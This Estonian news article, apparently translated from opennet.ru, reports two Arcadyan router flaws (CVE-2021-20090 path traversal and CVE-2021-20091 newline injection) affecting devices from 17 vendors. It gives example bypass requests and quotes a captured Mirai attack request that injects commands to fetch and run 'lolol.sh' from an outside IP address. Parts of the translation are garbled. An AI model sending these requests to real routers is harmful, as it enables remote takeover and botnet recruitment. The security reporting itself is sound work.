Haavatavus koduste ruuteriidses, mis hÔlmab 17 tootjat

VĂ”rgus on fikseeritud massiline rĂŒnnak koduste ruuterite vastu, mille tarkvaraversioonides kasutatakse Arcadyani http-serveri teostust. Seadmise ĂŒle juhtimise saamiseks kasutatakse kahte haavatavust, mis vĂ”imaldavad eemalt kĂ€itada mis tahes koodi root'i Ă”igustes. Probleem mĂ”jutab mitmeid ADSL-ruutereid ettevĂ”tetelt Arcadyan, ASUS ja Buffalo, samuti seadmeid, mis on tarnitud brĂ€ndide Beeline (probleem kinnitatud Smart Box Flash'is), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ja teiste sideettevĂ”tete poolt. MĂ€rgitakse, et probleem on Arcadyani tarkvaraversioonides olnud juba rohkem kui 10 aastat ja selle aja jooksul on see jĂ”udnud vĂ€hemalt 20 seadme mudelisse 17 erinevalt tootjalt.

Esimene haavatavus CVE-2021-20090 vĂ”imaldab pÀÀseda igale veebiliidese skriptile autentimiseta. Probleem seisneb selles, et veebiliideses on teatud kataloogid, mille kaudu jagatakse pilte, CSS-faile ja JavaScripti skripte, mis on kĂ€tte saadavad ilma autentimiseta. Samal ajal kontrollitakse katalooge, millele on lubatud ligi pÀÀseda autentimiseta, algse mustri alusel. Teedesse «..\/» mĂ€rgi mÀÀramine vanemasse kataloogi liikumiseks on pĂŒsivusprogrammi poolt blokeeritud, kuid kombinatsiooni «..» kasutamine lubatakse. Seega on vĂ”imalik avada kaitstud lehti, kui saata pĂ€ringuid nagu «http:\/\/192.168.1.1\/images\/..index.htm».

Teine haavatavus CVE-2021-20091 vĂ”imaldab autentitud kasutajal muuta seadme sĂŒsteemi seadistusi, saates spetsiaalselt vormistatud parameetreid skriptile apply_abstract.cgi, mis ei kontrolli parameetrites rea vahetuse sĂŒmboli olemasolu. NĂ€iteks vĂ”ib rĂŒndaja pingimise toimingu kĂ€igus mÀÀrata kontrollitava IP-aadressi vĂ€ljale vÀÀrtuse «192.168.1.2ARC_SYS_TelnetdEnable=1» ja skript, luues faili seadistustega \/tmp\/${ server etc\/config\/ .glbcfg, kirjutab sinna rea «AARC_SYS_TelnetdEnable=1», mis aktiveerib telnetd, andes piiramatud Ă”igused kĂ€suviibide peale pÀÀsemiseks. Samamoodi saab AARC_SYS parameetri seadistamisega tĂ€ita sĂŒsteemis mis tahes koodi. Esimene haavatavus vĂ”imaldab kĂ€ivitada probleemset skripti ilma autentimiseta, pöördudes selle poole nagu «\/images\/..apply_abstract.cgi».

RĂŒnnakuks peab rĂŒndajal olema vĂ”imalus saata pĂ€ring vĂ”rgupordile, kus töötab veebiliides. RĂŒnnaku leviku dĂŒnaamikast nĂ€htub, et paljud operaatorid jĂ€tavad oma seadmetele vĂ€lisest vĂ”rgust juurdepÀÀsu, et toetusteenus saaks probleeme lihtsamalt diagnoosida. Kui liidest on piiratud ainult sisevĂ”rgu jaoks, vĂ”ib rĂŒnnak toimuda vĂ€lisest vĂ”rgust tehnika abil nimega "DNS rebinding". Haavatavusi kasutatakse juba aktiivselt, et ĂŒhendada ruuterid botnetiga Mirai: POST /images/..apply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time5&ARC_ping_ipaddress=212.192.241.7 ARC_SYS_TelnetdEnable=1& ARC_SYS_=cd+\/tmp; wget+http:\/\/212.192.241.72\/lolol.sh; curl+-O+http:\/\/212.192.241.72\/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

Allikas: opennet.ru

Osta usaldusvÀÀrne veebimajutus DDoS-kaitsega veebisaitidele, VPS VDS serverid đŸ”„ Osta usaldusvÀÀrne veebimajutus DDoS-kaitsega veebisaitidele, VPS VDS serverid - ProHoster